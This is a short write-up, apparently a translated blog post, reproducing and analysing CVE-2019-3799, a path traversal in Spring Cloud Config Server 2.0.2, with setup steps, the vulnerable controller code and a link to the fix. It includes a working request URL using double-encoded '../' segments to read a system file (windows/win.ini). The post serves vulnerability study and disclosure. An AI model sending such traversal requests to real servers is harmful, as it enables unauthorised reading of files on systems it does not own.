[Java] CVE-2019-3799 Spring-Cloud-Config-Server path traversal / arbitrary file reading

1 minute read

recurrent

Idea create a spring project, and then add it to pom.xml

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-config-server</artifactId>
    <version>2.0.2.RELEASE</version>
</dependency>

Configure application.properties

server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git

Then visit http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini image.png

Analysis

Spring Cloud Config Server is a component of Spring for distributed management. It is responsible for storing configuration on the Server side, and the Client can obtain configuration values through http. The route corresponding to the payload exists in org.springframework.cloud.config.server.resource.ResourceController#retrieve(), its code

    @RequestMapping({"/{name}/{profile}/{label}/**"})
    public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
        String path = this.getFilePath(request, name, profile, label);
        return this.retrieve(name, profile, label, path, resolvePlaceholders);
    }

{name}/{profile}/{label}: name corresponds to the warehouse name, profile corresponds to the configuration file, label is the name of the git branch, generally there is a master branch. In the actual test, the name and profile values do not matter, but the label branch name must exist. Debug and follow up getFilePath image.png Here we have set the %25urldecode to %, continue with retrieve(), the path passed here is our payload

image.png

Continue to follow findOne, located at org.springframework.cloud.config.server.resource.GenericResourceRepository#findOne

image.png The locations directory file:/C:/Users/icu/AppData/Local/Temp/config-repo-6608031716294156148/ is the temporary location where the git warehouse is cloned in the configuration file, and then splicing ../ causes cross-directory file reading take.

Repair

https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

image.png

Urldecode by judging whether there is %, and then match special characters such as ../, .., /.

Reference

  1. Spring-Cloud-Config-Server-Any File Reading Analysis

Tags:

Updated: